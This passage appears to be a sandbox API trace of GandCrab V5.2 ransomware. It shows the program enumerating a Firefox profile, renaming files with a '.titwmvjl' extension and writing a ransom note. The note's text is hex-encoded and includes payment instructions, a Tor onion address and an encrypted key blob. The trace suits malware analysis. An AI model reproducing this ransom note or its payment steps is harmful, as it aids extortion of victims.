(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a09d2ca4deb61a.lock") returned 142 [0084.809] VirtualAlloc (lpAddress=0x0, dwSize=0x15c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.809] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 151 [0084.809] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a09d2ca4deb61a.lock") returned 142 [0084.809] lstrlenW (lpString=".lock") returned 5 [0084.809] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.809] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0084.810] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.810] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.810] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.810] lstrcmpW (lpString1="idb", lpString2=".") returned 1 [0084.810] lstrcmpW (lpString1="idb", lpString2="..") returned 1 [0084.810] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2="idb" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb" [0084.810] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\" [0084.810] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0084.810] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.810] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.811] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.811] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.811] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.811] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.811] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.811] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.811] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.811] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.811] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\\\TITWMVJL-DECRYPT.txt") returned 143 [0084.811] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0084.814] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x4